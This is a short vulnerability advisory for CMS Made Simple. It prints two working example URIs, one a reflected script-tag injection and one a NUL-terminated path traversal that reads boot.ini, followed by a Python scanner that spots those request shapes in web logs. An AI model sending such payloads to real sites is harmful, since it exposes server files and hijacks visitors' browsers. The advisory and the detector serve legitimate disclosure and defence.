CMS Made Simple Local File Include and Cross Site Scripting Vulnerabilities

Attackers can exploit these issues via a browser. To exploit a cross-site scripting issue, attackers must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
http://www.example.com/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
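A defender can look for both request shapes in web server logs. The following is an added example, not part of the original advisory: it percent-decodes the query string once and flags traversal sequences or a NUL byte in `mact`, and HTML metacharacters in any `showtemplate` parameter. The function names, finding labels and the benign sample request are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

TRAVERSAL = re.compile(r"\.\.[\\/]")   # "../" or "..\" after decoding
MARKUP = re.compile(r"[<>\"']")        # characters that can break out of an HTML attribute

def classify(request_uri):
    """Return a sorted list of findings for one request URI or path."""
    findings = set()
    query = urlsplit(request_uri).query
    # parse_qsl percent-decodes each name and value exactly once.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "mact":
            if TRAVERSAL.search(value):
                findings.add("lfi:traversal-in-mact")
            if "\x00" in value:
                findings.add("lfi:nul-byte-in-mact")
        # Covers both "showtemplate" and module-prefixed "cntnt01showtemplate".
        if name.endswith("showtemplate") and MARKUP.search(value):
            findings.add("xss:markup-in-showtemplate")
    return sorted(findings)

def scan(request_uris):
    """Map each flagged URI to its findings; clean requests are omitted."""
    return {u: f for u in request_uris if (f := classify(u))}

# Constructed sample requests: the two advisory patterns as they would appear
# in an access log, plus one ordinary News request (constructed, benign).
SAMPLES = [
    "/cmsmadesimple/index.php?page=tags-in-the-core"
    "&showtemplate=false%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E",
    "/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0"
    "&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39",
    "/cmsmadesimple/index.php?mact=News,cntnt01,detail,0"
    "&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39",
]

if __name__ == "__main__":
    for uri, findings in scan(SAMPLES).items():
        print(findings, uri)
```

The check decodes only once, so double-encoded input (`%252e%252e`) needs a second decoding pass before matching.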


 

Copyright 2010, SecurityFocus